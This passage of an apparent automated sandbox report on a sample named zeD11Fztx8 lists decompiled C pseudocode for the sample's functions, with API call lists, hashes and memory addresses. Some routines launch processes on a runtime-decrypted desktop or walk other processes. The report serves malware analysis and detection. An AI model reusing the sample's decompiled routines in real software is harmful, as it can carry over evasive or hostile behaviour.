                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
                      • String ID:
                      • API String ID: 1073023709-0
                      • Opcode ID: 1451e8c379b2d24f7d7fe2a85a38006b3437bfe47534797d4d36ce94ff61489e
                      • Instruction ID: ce3c3a9f70fdf00670dcdbe73326ca2e33eaf8e2d4f398aa59f27da128d0e836
                      • Opcode Fuzzy Hash: 1451e8c379b2d24f7d7fe2a85a38006b3437bfe47534797d4d36ce94ff61489e
                      • Instruction Fuzzy Hash: 37312671A00706AFEB20EF69DC81BADBBB8FB84704F608195E645D7284EB70D501CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 33%
                      			E01382180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
                      				char _v8;
                      				struct _STARTUPINFOW _v76;
                      				int _t29;
                      				WCHAR* _t31;
                      				int _t35;
                      				void* _t36;
                      
                      				_t35 = 0;
                      				_t31 = __ecx;
                      				memset( &_v76, 0, 0x44);
                      				_t36 = _a4;
                      				_v76.cb = 0x44;
                      				if(_t36 == 0) {
                      					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
                      				} else {
                      					_t5 = _t35 + 0x10; // 0x10
                      					E01381830(0x1381030, _t5, 0x47deb7fb,  &_a4);
                      					_v76.lpDesktop = _a4;
                      					_push(0);
                      					_push(_t36);
                      					_push( &_v8);
                      					if( *0x138c21c() != 0) {
                      						_t29 =  *0x138c04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
                      						_t35 = _t29;
                      						 *0x138c220(_v8);
                      					}
                      					HeapFree(GetProcessHeap(), 0, _a4);
                      					return _t35;
                      				}
                      			}

                      APIs
                      • memset.NTDLL ref: 01382194
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,0138A52C), ref: 01382232
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01382206
                      • HeapFree.KERNEL32(00000000), ref: 0138220D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateCreateFreememset
                      • String ID: D
                      • API String ID: 3667606640-2746444292
                      • Opcode ID: d7d6f02533d4208528d4a382c3498071d5bde514703330069120f383454c7008
                      • Instruction ID: eccc0156d36230ac0f5a03b0db367f9e63f51f2f7ac3ea8e0a8d04eaf22dd66a
                      • Opcode Fuzzy Hash: d7d6f02533d4208528d4a382c3498071d5bde514703330069120f383454c7008
                      • Instruction Fuzzy Hash: 36113D76600208BBEB209BA5EC49EDF7F7CEF85759F044025FA08D6240D7319A56CBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 01382422
                      • RtlAllocateHeap.NTDLL(00000000), ref: 01382429
                      • memcpy.NTDLL(01388583,?,?), ref: 01382467
                      • GetProcessHeap.KERNEL32(00000000,01388583), ref: 0138250A
                      • HeapFree.KERNEL32(00000000), ref: 01382511
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateFreememcpy
                      • String ID:
                      • API String ID: 461410222-0
                      • Opcode ID: 423b1149bf7f29224d21783e6e7134c66954502093222355b790a37c85fb3783
                      • Instruction ID: 30868caf2d34c043d93202e7be4dc595b7e30c91ea79da43be8247ca21f0e06d
                      • Opcode Fuzzy Hash: 423b1149bf7f29224d21783e6e7134c66954502093222355b790a37c85fb3783
                      • Instruction Fuzzy Hash: 68411A71900209AFEF219FA9DC44FEEBBBDEB44344F144169E905E7191E7719A04DB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,01388644,?), ref: 0138256D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 01382574
                      • memcpy.NTDLL(01388644,?,?), ref: 013825AE
                      • GetProcessHeap.KERNEL32(00000000,01388644), ref: 0138260C
                      • HeapFree.KERNEL32(00000000), ref: 01382613
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateFreememcpy
                      • String ID:
                      • API String ID: 461410222-0
                      • Opcode ID: fb3d07f5e898688fa684bf29db55acbe2e0670a7da12661c6e6ad2fbf9000c9e
                      • Instruction ID: 1a8df21d2ab5dc25194601ba05bd75fb0358700e5e25bec9f14942bc045ab614
                      • Opcode Fuzzy Hash: fb3d07f5e898688fa684bf29db55acbe2e0670a7da12661c6e6ad2fbf9000c9e
                      • Instruction Fuzzy Hash: C9318E71640305BFEB219FA8EC85B9EBBBDFB08758F200161FA05E6190D7719A50DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E01388290(int* __ecx, signed int _a8) {
                      				intOrPtr _t66;
                      				int* _t88;
                      				signed int _t89;
                      				void* _t90;
                      
                      				_t89 = _a8;
                      				_t88 = __ecx;
                      				 *__ecx = 0;
                      				__ecx[1] = 0;
                      				__ecx[2] = _t89;
                      				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
                      				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
                      				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
                      				if((_t89 & 0x00008000) == 0) {
                      					_t17 = _t88 + 0x29272; // 0x29272
                      					memset(_t17, 0, 0x10000);
                      					_t90 = _t90 + 0xc;
                      				}
                      				_t18 = _t88 + 0x9273; // 0x9273
                      				 *(_t88 + 0x44) = 0;
                      				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
                      				_t21 = _t88 + 0x9272; // 0x9272
                      				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
                      				_t23 = _t88 + 0x39272; // 0x39272
                      				_t66 = _t23;
                      				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
                      				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
                      				_t26 = _t88 + 0x8192; // 0x8192
                      				 *(_t88 + 0x40) = 0;
                      				 *(_t88 + 0x3c) = 0;
                      				 *(_t88 + 0x24) = 0;
                      				 *(_t88 + 0x20) = 0;
                      				 *(_t88 + 0x1c) = 0;
                      				 *(_t88 + 0x68) = 0;
                      				 *(_t88 + 0x48) = 0;
                      				 *(_t88 + 0x64) = 0;
                      				 *(_t88 + 0x60) = 0;
                      				 *(_t88 + 0x5c) = 0;
                      				 *(_t88 + 0x58) = 0;
                      				 *((intOrPtr*)(_t88 + 0x38)) = 8;
                      				 *(_t88 + 0x6c) = 0;
                      				 *(_t88 + 0x54) = 0;
                      				 *(_t88 + 0x50) = 0;
                      				 *(_t88 + 0x4c) = 0;
                      				 *((intOrPtr*)(_t88 + 0x18)) = 1;
                      				 *(_t88 + 0x70) = 0;
                      				 *(_t88 + 0x74) = 0;
                      				 *(_t88 + 0x78) = 0;
                      				 *(_t88 + 0x7c) = 0;
                      				 *(_t88 + 0x80) = 0;
                      				 *(_t88 + 0x84) = 0;
                      				 *(_t88 + 0x88) = 0;
                      				 *(_t88 + 0x8c) = 0;
                      				memset(_t26, 0, 0x240);
                      				_t52 = _t88 + 0x83d2; // 0x83d2
                      				memset(_t52, 0, 0x40);
                      				return 0;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: memset
                      • String ID: VUUU$VUUU
                      • API String ID: 2221118986-3149182767
                      • Opcode ID: 0abbcd096af252457c2f583d44ce74b69671040b58c779890dd95c5c90c929be
                      • Instruction ID: 059f37dd4a960b45993c847f2ba5e2b413763a35c89fb4b109b5b56765607cd4
                      • Opcode Fuzzy Hash: 0abbcd096af252457c2f583d44ce74b69671040b58c779890dd95c5c90c929be
                      • Instruction Fuzzy Hash: 6241B9B1610A06BBE308CF65C569782FBE4FF44708F548219D6598BB80D7BAB168CFC4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
                        • Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B
                      • _snwprintf.NTDLL ref: 013899E3
                      • GetProcessHeap.KERNEL32(00000000,01388F37), ref: 01389A5E
                      • HeapFree.KERNEL32(00000000), ref: 01389A65
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 01389A70
                      • HeapFree.KERNEL32(00000000), ref: 01389A77
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$Free$Allocate_snwprintf
                      • String ID:
                      • API String ID: 2579732983-0
                      • Opcode ID: 7565d9efcec4e132807bf8e1a2cdbf7a3df8f4478dcefa0f411690b38e3557c2
                      • Instruction ID: 4fbf78595eb8f0eea29e29d992c48a701038b30d8b33e1c8f25443771affca31
                      • Opcode Fuzzy Hash: 7565d9efcec4e132807bf8e1a2cdbf7a3df8f4478dcefa0f411690b38e3557c2
                      • Instruction Fuzzy Hash: 40217F71A40308BFFF20ABE0AC4AFED7B6DAB48709F201051FA09E5195D7B59A458B61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E01388AA0() {
                      				int _t8;
                      				void* _t16;
                      				void* _t17;
                      
                      				_t17 =  *0x138c274; // 0x0
                      				if(_t17 != 0) {
                      					do {
                      						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
                      						_t17 =  *_t17;
                      					} while (_t17 != 0);
                      					_t17 =  *0x138c274; // 0x0
                      				}
                      				_t16 = 0x138c274;
                      				while(_t17 != 0) {
                      					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
                      					if(_t8 == 0x102) {
                      						_t16 = _t17;
                      					} else {
                      						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
                      						VirtualFree( *(_t17 + 8), 0, 0x8000);
                      						CloseHandle( *(_t17 + 0x10));
                      						 *_t16 =  *_t17;
                      						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
                      					}
                      					_t17 =  *_t16;
                      				}
                      				return _t8;
                      			}






                      0x01388aa1
                      0x01388aaa
                      0x01388ab0
                      0x01388aba
                      0x01388abc
                      0x01388abe
                      0x01388ac2
                      0x01388ac2
                      0x01388ac8
                      0x01388acf
                      0x01388ad6
                      0x01388ae1
                      0x01388b1e
                      0x01388ae3
                      0x01388aed
                      0x01388af9
                      0x01388b02
                      0x01388b0d
                      0x01388b16
                      0x01388b16
                      0x01388b20
                      0x01388b22
                      0x01388b28

                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,01389315,01389286), ref: 01388AD6
                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01388AF9
                      • CloseHandle.KERNEL32(?), ref: 01388B02
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01388B0F
                      • HeapFree.KERNEL32(00000000), ref: 01388B16
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
                      • String ID:
                      • API String ID: 797926041-0
                      • Opcode ID: e486e5821af46e0cb002e7d482c56e25fabd64e10d8c512c17400b512462a83e
                      • Instruction ID: d8981dbc9c68fa1a166c6c489d4f95a41e5fea3e5c7cc23a2fe295b72a82f22f
                      • Opcode Fuzzy Hash: e486e5821af46e0cb002e7d482c56e25fabd64e10d8c512c17400b512462a83e
                      • Instruction Fuzzy Hash: C0018032900720ABEB325FA8DC48B4AB7B5FF44B20F154A44FA95AB6D4C730AC418B90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E013888B0(long __ecx) {
                      				int _t6;
                      				long _t13;
                      				void* _t15;
                      				void* _t16;
                      
                      				_t16 =  *0x138c274; // 0x0
                      				_t13 = __ecx;
                      				_t15 = 0x138c274;
                      				while(_t16 != 0) {
                      					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
                      					if(_t6 == 0x102) {
                      						_t15 = _t16;
                      					} else {
                      						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
                      						VirtualFree( *(_t16 + 8), 0, 0x8000);
                      						CloseHandle( *(_t16 + 0x10));
                      						 *_t15 =  *_t16;
                      						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
                      					}
                      					_t16 =  *_t15;
                      				}
                      				return _t6;
                      			}







                      0x013888b2
                      0x013888b8
                      0x013888bb
                      0x013888c2
                      0x013888c8
                      0x013888d3
                      0x01388910
                      0x013888d5
                      0x013888df
                      0x013888eb
                      0x013888f4
                      0x013888ff
                      0x01388908
                      0x01388908
                      0x01388912
                      0x01388914
                      0x0138891b

                      APIs
                      • WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,01388F3E), ref: 013888C8
                      • VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,01388F3E), ref: 013888EB
                      • CloseHandle.KERNEL32(?,?,000DBBA0,?,01388F3E), ref: 013888F4
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,01388F3E), ref: 01388901
                      • HeapFree.KERNEL32(00000000,?,000DBBA0,?,01388F3E), ref: 01388908
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
                      • String ID:
                      • API String ID: 797926041-0
                      • Opcode ID: 5ed8fd5031f677b45f742107be25e32d77034045b60042e6b49820772373c715
                      • Instruction ID: 0021867b7ba3d4780b7640a87516508eeaa337327022c70df866df8049a899a9
                      • Opcode Fuzzy Hash: 5ed8fd5031f677b45f742107be25e32d77034045b60042e6b49820772373c715
                      • Instruction Fuzzy Hash: C1F04F35640710AFEB316FA8DC89B9A7BB9FF44711F200554F681D76A4C770AC408BA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 30%
                      			E01381E50(void* __ecx, void** __edx, long* _a4) {
                      				long _v8;
                      				long _v12;
                      				long _v16;
                      				void** _v20;
                      				long _t36;
                      				void* _t42;
                      				long _t46;
                      				void* _t49;
                      				void* _t52;
                      				void* _t53;
                      
                      				_push(0);
                      				_v20 = __edx;
                      				_push( &_v8);
                      				_v8 = 4;
                      				_t42 = __ecx;
                      				_push( &_v16);
                      				_push(0x20000005);
                      				_push( *((intOrPtr*)(__ecx + 8)));
                      				if( *0x138c238() == 0) {
                      					return 0;
                      				} else {
                      					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
                      					if(_t49 == 0) {
                      						return 0;
                      					} else {
                      						_v8 = 0;
                      						_v12 = 0;
                      						_t53 =  *0x138c248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
                      						if(_t53 == 0) {
                      							L7:
                      							HeapFree(GetProcessHeap(), 0, _t49);
                      							if(_t53 != 0) {
                      								goto L8;
                      							}
                      						} else {
                      							while(1) {
                      								_t36 = _v12;
                      								if(_t36 == 0) {
                      									break;
                      								}
                      								_t46 = _v8 + _t36;
                      								_v8 = _t46;
                      								_t53 =  *0x138c248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
                      								if(_t53 != 0) {
                      									continue;
                      								} else {
                      									goto L7;
                      								}
                      								goto L9;
                      							}
                      							if(_t53 != 0) {
                      								L8:
                      								 *_v20 = _t49;
                      								 *_a4 = _v8;
                      							} else {
                      								goto L7;
                      							}
                      						}
                      						L9:
                      						return _t53;
                      					}
                      				}
                      			}













                      0x01381e57
                      0x01381e5c
                      0x01381e5f
                      0x01381e63
                      0x01381e6a
                      0x01381e6c
                      0x01381e6d
                      0x01381e72
                      0x01381e7d
                      0x01381f30
                      0x01381e83
                      0x01381e96
                      0x01381e9a
                      0x01381f29
                      0x01381ea0
                      0x01381ea4
                      0x01381eaf
                      0x01381ec0
                      0x01381ec4
                      0x01381ef8
                      0x01381f02
                      0x01381f0a
                      0x00000000
                      0x00000000
                      0x01381ec6
                      0x01381ec6
                      0x01381ec6
                      0x01381ecb
                      0x00000000
                      0x00000000
                      0x01381ed0
                      0x01381edb
                      0x01381eec
                      0x01381ef0
                      0x00000000
                      0x01381ef2
                      0x00000000
                      0x01381ef2
                      0x00000000
                      0x01381ef0
                      0x01381ef6
                      0x01381f0c
                      0x01381f12
                      0x01381f17
                      0x00000000
                      0x00000000
                      0x00000000
                      0x01381ef6
                      0x01381f19
                      0x01381f21
                      0x01381f21
                      0x01381e9a

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,01388631), ref: 01381E89
                      • RtlAllocateHeap.NTDLL(00000000), ref: 01381E90
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381EFB
                      • HeapFree.KERNEL32(00000000), ref: 01381F02
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateFree
                      • String ID:
                      • API String ID: 576844849-0
                      • Opcode ID: fb9743e950b1a065ae134e23e0b28ab3d192234c7c9e87d3af9c394e6414831e
                      • Instruction ID: f17a6913dfd342a7ec72f1e25df4cedf187e092f51d7ec2c07f4a2e1b161d720
                      • Opcode Fuzzy Hash: fb9743e950b1a065ae134e23e0b28ab3d192234c7c9e87d3af9c394e6414831e
                      • Instruction Fuzzy Hash: AE212F75A00208AFEB219F98D848FAEBBBCEB44715F140195ED09E7254D7319E11DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E01388420(intOrPtr __ecx, signed int __edx, long* _a4) {
                      				intOrPtr _v8;
                      				void* _t20;
                      				signed int _t28;
                      				signed int _t36;
                      				long _t44;
                      				void* _t45;
                      
                      				_t36 = __edx;
                      				_t26 = _a4;
                      				_v8 = __ecx;
                      				_t28 = __edx * 0x6e;
                      				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
                      				 *_a4 = _t44;
                      				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
                      				_t45 = _t20;
                      				if(_t45 == 0) {
                      					return _t20;
                      				} else {
                      					_push(_t28);
                      					if(E013829B0(_t45, _t26, _v8, _t36) == 0) {
                      						return _t45;
                      					}
                      					HeapFree(GetProcessHeap(), 0, _t45);
                      					return 0;
                      				}
                      			}









                      0x01388429
                      0x0138842b
                      0x01388433
                      0x01388438
                      0x01388460
                      0x01388466
                      0x0138846f
                      0x01388475
                      0x01388479
                      0x013884b1
                      0x0138847b
                      0x0138847b
                      0x0138848e
                      0x00000000
                      0x013884a9
                      0x0138849a
                      0x013884a8
                      0x013884a8

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 01388468
                      • RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138846F
                        • Part of subcall function 013829B0: memset.NTDLL ref: 013829C4
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 01388493
                      • HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0138849A
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateFreememset
                      • String ID:
                      • API String ID: 1319286391-0
                      • Opcode ID: 5a239bb8532d7881b747e5eae86821cc2a59f0d221f6f726715f18ba2985d596
                      • Instruction ID: 5d2dcb96fd3bf33aee8fdf226f5f8d3bc062c26c9512ad48a6f9ddb508723749
                      • Opcode Fuzzy Hash: 5a239bb8532d7881b747e5eae86821cc2a59f0d221f6f726715f18ba2985d596
                      • Instruction Fuzzy Hash: BD01DB33F006246BD7245BADAC4969EBB6DDBC8661F414275FD0CE7384EA218C1083E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E013818D0() {
                      				short _v524;
                      				signed int _t14;
                      				signed char _t16;
                      				void* _t21;
                      				void* _t22;
                      
                      				memset( &_v524, 0, 0x208);
                      				if( *0x138c7c0 == 0) {
                      					L9:
                      					return 1;
                      				} else {
                      					_t21 = 0;
                      					do {
                      						_t2 = _t21 + 0x138c7c0; // 0x0
                      						_t14 =  *_t2 & 0x0000ffff;
                      						_t21 = _t21 + 2;
                      						 *(_t22 + _t21 - 0x20a) = _t14;
                      						if(_t14 != 0x5c) {
                      							goto L8;
                      						} else {
                      							_t16 = GetFileAttributesW( &_v524);
                      							if(_t16 != 0xffffffff) {
                      								if((_t16 & 0x00000010) == 0) {
                      									goto L6;
                      								} else {
                      									goto L8;
                      								}
                      							} else {
                      								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
                      									goto L8;
                      								} else {
                      									L6:
                      									return 0;
                      								}
                      							}
                      						}
                      						goto L10;
                      						L8:
                      					} while ( *(_t21 + 0x138c7c0) != 0);
                      					goto L9;
                      				}
                      				L10:
                      			}








                      0x013818e8
                      0x013818f9
                      0x0138195e
                      0x01381967
                      0x013818fb
                      0x013818fb
                      0x01381900
                      0x01381900
                      0x01381900
                      0x01381907
                      0x0138190a
                      0x01381915
                      0x00000000
                      0x01381917
                      0x0138191e
                      0x01381927
                      0x01381952
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x01381929
                      0x0138193a
                      0x00000000
                      0x01381949
                      0x01381949
                      0x0138194f
                      0x0138194f
                      0x0138193a
                      0x01381927
                      0x00000000
                      0x01381954
                      0x01381954
                      0x00000000
                      0x01381900
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: AttributesCreateDirectoryErrorFileLastmemset
                      • String ID:
                      • API String ID: 528582180-0
                      • Opcode ID: c0e495dfed314229576cb5e20bb0f9f4993fbf781d2e8414b3693d19db10491c
                      • Instruction ID: a2aa4c5ad9373089d37fc3a5cdc3298bc539dea4815dfc1136ccd651e5f573a5
                      • Opcode Fuzzy Hash: c0e495dfed314229576cb5e20bb0f9f4993fbf781d2e8414b3693d19db10491c
                      • Instruction Fuzzy Hash: 5501D8319003155FEB70BB68A84D7EA776CFB00718F001655F969E30C5EB74A585C7D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E01388B30(WCHAR* _a4, intOrPtr* _a8) {
                      				intOrPtr* _t14;
                      				intOrPtr* _t19;
                      				intOrPtr _t24;
                      				WCHAR* _t25;
                      				intOrPtr* _t26;
                      
                      				_t25 = _a4;
                      				_t10 = _t25 + 0x24;
                      				_a4 = _t25 + 0x24;
                      				_t24 = E013819E0(_t10);
                      				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
                      					L8:
                      					return 1;
                      				}
                      				_t19 = _a8;
                      				_t14 =  *_t19;
                      				if(_t14 == 0) {
                      					L5:
                      					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
                      					if(_t26 != 0) {
                      						_t8 = _t26 + 4; // 0x4
                      						lstrcpyW(_t8, _a4);
                      						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
                      						 *_t26 =  *_t19;
                      						 *_t19 = _t26;
                      					}
                      					L7:
                      					goto L8;
                      				}
                      				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
                      					_t14 =  *_t14;
                      					if(_t14 != 0) {
                      						continue;
                      					}
                      					goto L5;
                      				}
